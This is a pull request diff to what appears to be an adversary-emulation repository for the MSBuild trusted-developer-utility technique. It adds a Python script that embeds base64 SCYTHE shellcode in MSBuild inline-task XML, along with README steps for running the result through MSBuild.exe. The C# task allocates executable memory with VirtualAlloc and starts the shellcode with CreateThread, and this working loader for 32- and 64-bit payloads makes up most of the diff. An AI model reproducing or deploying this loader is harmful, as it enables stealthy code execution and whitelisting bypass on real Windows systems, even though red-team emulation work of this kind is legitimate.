### PR TITLE
Adding Python file for automating the generation of a proof of concept XML file with SCYTHE shell code

### DIFF
--- a/T1127.001 - Trusted Developer Utilities Proxy Execution - MSBuild/Readme.md
+++ b/T1127.001 - Trusted Developer Utilities Proxy Execution - MSBuild/Readme.md
@@ -8,32 +8,6 @@ First, you must obtain shellcode that loads the malicious payload you wish to ex
 
 Create a Campaign in the SCYTHE UI. Then, follow the instructions below depending on your version of SCYTHE.
 
-## Using the msbuild_gen.py Script
-
-**The Python3 msbuild_gen.py script contained in this repository automates the processes below. The script is provided as-is and is not officially supported by SCYTHE. It is a proof of concept on how to use the SCYTHE shellcode in an automated and consistent build process.**
-
-For leveraging 32 bit shellcode downloaded:
-
-Running the following command with the shellcode file being named `shellcode32.bin` will result in a bad32.xml file created in the directory.
-```python
-python3 msbuild_gen.py shellcode32.bin 32
-```
-To then execute this, run the following in PowerShell
-```
-C:\Windows\Microsoft.NET\Framework\\v4.0.30319\MSBuild.exe .\\bad-32.xml
-```
-
-For leveraging 64 bit shellcode downloaded:
-
-Running the following command with the shellcode file being named `shellcode64.bin` will result in a bad64.xml file created in the directory.
-```python
-python3 msbuild_gen.py shellcode64.bin 64
-```
-To then execute this, run the following in PowerShell
-```
-C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\MSBuild.exe .\\bad-64.xml
-```
-
 ### Pre-3.4
 
 In the Campaign List, select the Campaign that you created to view its detailed page. Click the "More Actions..." dropdown menu, and select "Direct-Downloads Links". You will be shown a list of download links. Each is the SCYTHE client in a different executable format. To download the shellcode format, choose either the 32-bit or 64-bit "Reflective Loader + DLL" link and paste it into your browser. The shellcode should begin downloading.
@@ -41,6 +15,33 @@ In the Campaign List, select the Campaign that you created to view its detailed 
 ### 3.4
 
 In the Campaign List, select the Campaign that you created to view its detailed page. Click the "Download" button. You will be shown a "Download Campaign Client" menu. Select your preferred architecture (64-bit or 32-bit) and "Shellcode + DLL" for the File Type. Click the Download SCYTHE Client button. The shellcode should begin downloading.
+
+
+## Using the msbuild_gen.py Script
+
+**The Python3 msbuild_gen.py script contained in this repository automates the processes below. The script is provided as-is and is not officially supported by SCYTHE. It is a proof of concept on how to use the SCYTHE shellcode in an automated and consistent build process.**
+
+### For leveraging 32 bit shellcode downloaded:
+
+Running the following command with the shellcode file being named `shellcode32.bin` will result in a bad32.xml file created in the directory.
+```python
+python3 msbuild_gen.py shellcode32.bin 32
+```
+To then execute this, run the following in PowerShell
+```
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe .\bad-32.xml
+```
+
+### For leveraging 64 bit shellcode downloaded:
+
+Running the following command with the shellcode file being named `shellcode64.bin` will result in a bad64.xml file created in the directory.
+```python
+python3 msbuild_gen.py shellcode64.bin 64
+```
+To then execute this, run the following in PowerShell
+```
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe .\bad-64.xml
+```
 
 ## Creating the Shellcode Runner for 32-bit
 

--- a/T1127.001 - Trusted Developer Utilities Proxy Execution - MSBuild/Readme.md
+++ b/T1127.001 - Trusted Developer Utilities Proxy Execution - MSBuild/Readme.md
@@ -8,6 +8,32 @@ First, you must obtain shellcode that loads the malicious payload you wish to ex
 
 Create a Campaign in the SCYTHE UI. Then, follow the instructions below depending on your version of SCYTHE.
 
+## Using the msbuild_gen.py Script
+
+**The Python3 msbuild_gen.py script contained in this repository automates the processes below. The script is provided as-is and is not officially supported by SCYTHE. It is a proof of concept on how to use the SCYTHE shellcode in an automated and consistent build process.**
+
+For leveraging 32 bit shellcode downloaded:
+
+Running the following command with the shellcode file being named `shellcode32.bin` will result in a bad32.xml file created in the directory.
+```python
+python3 msbuild_gen.py shellcode32.bin 32
+```
+To then execute this, run the following in PowerShell
+```
+C:\Windows\Microsoft.NET\Framework\\v4.0.30319\MSBuild.exe .\\bad-32.xml
+```
+
+For leveraging 64 bit shellcode downloaded:
+
+Running the following command with the shellcode file being named `shellcode64.bin` will result in a bad64.xml file created in the directory.
+```python
+python3 msbuild_gen.py shellcode64.bin 64
+```
+To then execute this, run the following in PowerShell
+```
+C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\MSBuild.exe .\\bad-64.xml
+```
+
 ### Pre-3.4
 
 In the Campaign List, select the Campaign that you created to view its detailed page. Click the "More Actions..." dropdown menu, and select "Direct-Downloads Links". You will be shown a list of download links. Each is the SCYTHE client in a different executable format. To download the shellcode format, choose either the 32-bit or 64-bit "Reflective Loader + DLL" link and paste it into your browser. The shellcode should begin downloading.
@@ -16,7 +42,7 @@ In the Campaign List, select the Campaign that you created to view its detailed 
 
 In the Campaign List, select the Campaign that you created to view its detailed page. Click the "Download" button. You will be shown a "Download Campaign Client" menu. Select your preferred architecture (64-bit or 32-bit) and "Shellcode + DLL" for the File Type. Click the Download SCYTHE Client button. The shellcode should begin downloading.
 
-## Creating the Shellcode Runner
+## Creating the Shellcode Runner for 32-bit
 
 Transform the shellcode file into a Base64 format. You may do this however you like, but any easy method is the following:
 
@@ -104,3 +130,92 @@ AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Task
     * `C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe .\msbuild.xml`
     * The SCYTHE client should connect with your SCYTHE server.
     * If the Powershell window is closed, connection will drop.
+
+## Creating the Shellcode Runner for 64-bit shellcode
+
+Transform the shellcode file into a Base64 format. You may do this however you like, but any easy method is the following:
+
+1) Open a PowerShell prompt and use the following code to transform the .bin file into a Base64-string. 
+
+    * Edit the path to the appropriate path for your .bin file.
+    * Ensure you have double "\\\\" between directories in the string.
+```powershell
+$filename = "C:\\Users\\User\\Downloads\\test1_scythe_client64.bin"
+[Convert]::ToBase64String([IO.File]::ReadAllBytes($filename)) | clip
+```
+ 
+2) You will now have a large Base64 string in your clipboard that you may paste elsewhere. Create a new XML file with and paste the following into it, replacing the existing Base64 string:
+
+```xml
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<!-- This inline task executes shellcode. This example XML file is modified from an example payload created by Casey Smith. It has been modified to support non-blocking shellcode loaders.-->
+<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
+<!-- Save This File And Execute The Above Command -->
+<!-- Authors: Casey Smith, Twitter: @subTee , The Wover-->
+<!-- License: BSD 3-Clause -->
+<Target Name="Run">
+<ClassExample />
+</Target>
+<UsingTask
+TaskName="ClassExample"
+TaskFactory="CodeTaskFactory"
+AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+    <Task>
+        <Code Type="Class" Language="cs">
+            <![CDATA[
+            using System;
+            using System.Runtime.InteropServices;
+            using Microsoft.Build.Framework;
+            using Microsoft.Build.Utilities;
+            public class ClassExample :  Task, ITask
+            {         
+                private static UInt64 MEM_COMMIT = 0x1000;
+                private static UInt64 PAGE_EXECUTE_READWRITE = 0x40;
+
+                [DllImport("kernel32")]
+                private static extern UInt64 VirtualAlloc(UInt64 lpStartAddr, UInt64 size, UInt64 flAllocationType, UInt64 flProtect);
+
+                [DllImport("kernel32")]
+                private static extern IntPtr CreateThread(UInt64 lpThreadAttributes, UInt64 dwStackSize, UInt64 lpStartAddress, IntPtr param, UInt64 dwCreationFlags, ref UInt64 lpThreadId);
+
+                [DllImport("kernel32")]
+                private static extern UInt64 WaitForSingleObject(IntPtr hHandle, UInt64 dwMilliseconds);
+
+                public override bool Execute()
+                {
+                //replace with your own shellcode
+                    string b64 = "YOmlAgAAW4PsKInliV0Ag8MAZKEwAAA.....AAAAAAAAAA=";
+                   byte[] shellcode = System.Convert.FromBase64String(b64);
+                    
+                    UInt64 funcAddr = VirtualAlloc(0, (UInt64)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+                    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
+                    IntPtr hThread = IntPtr.Zero;
+                    UInt64 threadId = 0;
+                    IntPtr pinfo = IntPtr.Zero;
+                    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
+
+                    // Loop endlessly to prevent the process from exiting
+                    int x = 0;
+                    for (int i = 0; i==i; i++) 
+                    {
+                        x = i;
+                        x++;
+                    }
+                    return true;
+                } 
+            }     
+            ]]>
+            </Code>
+        </Task>
+    </UsingTask>
+</Project>
+```
+
+3) When you replace the existing base64 string with your own, keep in mind the following. 
+    * Delete the pre-existing text between the double quotes and the paste from your clipboard.
+    * Make sure that there are no spaces or newlines inside of the string or between the double quotes.
+4) Save the file as an XML file (such as `msbuild.xml`).
+5) In your Powershell prompt, run the following command, replacing the path to the .XML file with your own:
+    * `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe .\msbuild.xml`
+    * The SCYTHE client should connect with your SCYTHE server.
+    * If the Powershell window is closed, connection will drop

--- a/T1127.001 - Trusted Developer Utilities Proxy Execution - MSBuild/msbuild_gen.py
+++ b/T1127.001 - Trusted Developer Utilities Proxy Execution - MSBuild/msbuild_gen.py
@@ -1,0 +1,161 @@
+#!/usr/bin/env python3
+# MSBuild Item Generator for SCYTHE Shellcode
+# Credit to https://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c for the idea
+# and credit to The Wover for help with shellcode troubleshooting
+import sys, base64
+
+Generic_msbuild32_string1 = """
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<!-- This inline task executes shellcode. This example XML file is modified from an example payload created by Casey Smith. It has been modified to support non-blocking shellcode loaders.-->
+<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
+<!-- Save This File And Execute The Above Command -->
+<!-- Authors: Casey Smith, Twitter: @subTee , The Wover-->
+<!-- License: BSD 3-Clause -->
+<Target Name="Run">
+<ClassExample />
+</Target>
+<UsingTask
+TaskName="ClassExample"
+TaskFactory="CodeTaskFactory"
+AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+    <Task>
+        <Code Type="Class" Language="cs">
+            <![CDATA[
+            using System;
+            using System.Runtime.InteropServices;
+            using Microsoft.Build.Framework;
+            using Microsoft.Build.Utilities;
+            public class ClassExample :  Task, ITask
+            {         
+                private static UInt32 MEM_COMMIT = 0x1000;
+                private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
+
+                [DllImport("kernel32")]
+                private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
+
+                [DllImport("kernel32")]
+                private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
+
+                [DllImport("kernel32")]
+                private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
+
+                public override bool Execute()
+                {
+			"""
+
+Generic_msbuild32_string2 = """
+		      byte[] shellcode = System.Convert.FromBase64String(b64);
+                    
+                    UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+                    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
+                    IntPtr hThread = IntPtr.Zero;
+                    UInt32 threadId = 0;
+                    IntPtr pinfo = IntPtr.Zero;
+                    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
+
+                    // Loop endlessly to prevent the process from exiting
+                    int x = 0;
+                    for (int i = 0; i==i; i++) 
+                    {
+                        x = i;
+                        x++;
+                    }
+                    return true;
+                } 
+            }     
+            ]]>
+            </Code>
+        </Task>
+    </UsingTask>
+</Project>
+"""
+
+Generic_msbuild64_string1 = """
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+<!-- This inline task executes shellcode. This example XML file is modified from an example payload created by Casey Smith. It has been modified to support non-blocking shellcode loaders.-->
+<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
+<!-- Save This File And Execute The Above Command -->
+<!-- Authors: Casey Smith, Twitter: @subTee , The Wover-->
+<!-- License: BSD 3-Clause -->
+<Target Name="Run">
+<ClassExample />
+</Target>
+<UsingTask
+TaskName="ClassExample"
+TaskFactory="CodeTaskFactory"
+AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+    <Task>
+        <Code Type="Class" Language="cs">
+            <![CDATA[
+            using System;
+            using System.Runtime.InteropServices;
+            using Microsoft.Build.Framework;
+            using Microsoft.Build.Utilities;
+            public class ClassExample :  Task, ITask
+            {         
+                private static UInt64 MEM_COMMIT = 0x1000;
+                private static UInt64 PAGE_EXECUTE_READWRITE = 0x40;
+
+                [DllImport("kernel32")]
+                private static extern UInt64 VirtualAlloc(UInt64 lpStartAddr, UInt64 size, UInt64 flAllocationType, UInt64 flProtect);
+
+                [DllImport("kernel32")]
+                private static extern IntPtr CreateThread(UInt64 lpThreadAttributes, UInt64 dwStackSize, UInt64 lpStartAddress, IntPtr param, UInt64 dwCreationFlags, ref UInt64 lpThreadId);
+
+                [DllImport("kernel32")]
+                private static extern UInt64 WaitForSingleObject(IntPtr hHandle, UInt64 dwMilliseconds);
+
+                public override bool Execute()
+                {
+			"""
+
+Generic_msbuild64_string2 = """
+		      byte[] shellcode = System.Convert.FromBase64String(b64);
+                    
+                    UInt64 funcAddr = VirtualAlloc(0, (UInt64)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+                    Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
+                    IntPtr hThread = IntPtr.Zero;
+                    UInt64 threadId = 0;
+                    IntPtr pinfo = IntPtr.Zero;
+                    hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
+
+                    // Loop endlessly to prevent the process from exiting
+                    int x = 0;
+                    for (int i = 0; i==i; i++) 
+                    {
+                        x = i;
+                        x++;
+                    }
+                    return true;
+                } 
+            }     
+            ]]>
+            </Code>
+        </Task>
+    </UsingTask>
+</Project>
+"""
+
+scythe_shellcode_bin = sys.argv[1]
+isit_32_or_64_shellcode = sys.argv[2]
+
+with open(scythe_shellcode_bin, "rb") as f:
+    encoded_string = base64.b64encode(f.read())
+    base64_message = encoded_string.decode('UTF-8')
+shellcode_string = 'string b64 = "' + base64_message +'";'
+
+if isit_32_or_64_shellcode == '32':
+    with open('bad-32.xml', 'w') as msbuild:
+        msbuild.write(Generic_msbuild32_string1)
+        msbuild.write(shellcode_string)
+        msbuild.write(Generic_msbuild32_string2)
+        print("To execute, run the following in PowerShell - C:\Windows\Microsoft.NET\Framework\\v4.0.30319\MSBuild.exe .\\bad-32.xml")
+elif isit_32_or_64_shellcode == '64':
+    with open('bad-64.xml', 'w') as msbuild:
+        msbuild.write(Generic_msbuild64_string1)
+        msbuild.write(shellcode_string)
+        msbuild.write(Generic_msbuild64_string2)
+        print("To execute, run the following in PowerShell - C:\Windows\Microsoft.NET\Framework64\\v4.0.30319\MSBuild.exe .\\bad-64.xml")
+else:
+    print("Must specify shellcode as 32 or 64 after the file name")
+print("Done.")


### PR DESCRIPTION
Adding Python file for automating the generation of a proof of concept XML file with SCYTHE shell code. Also changed the README to account for 32bit and 64 bit shell code.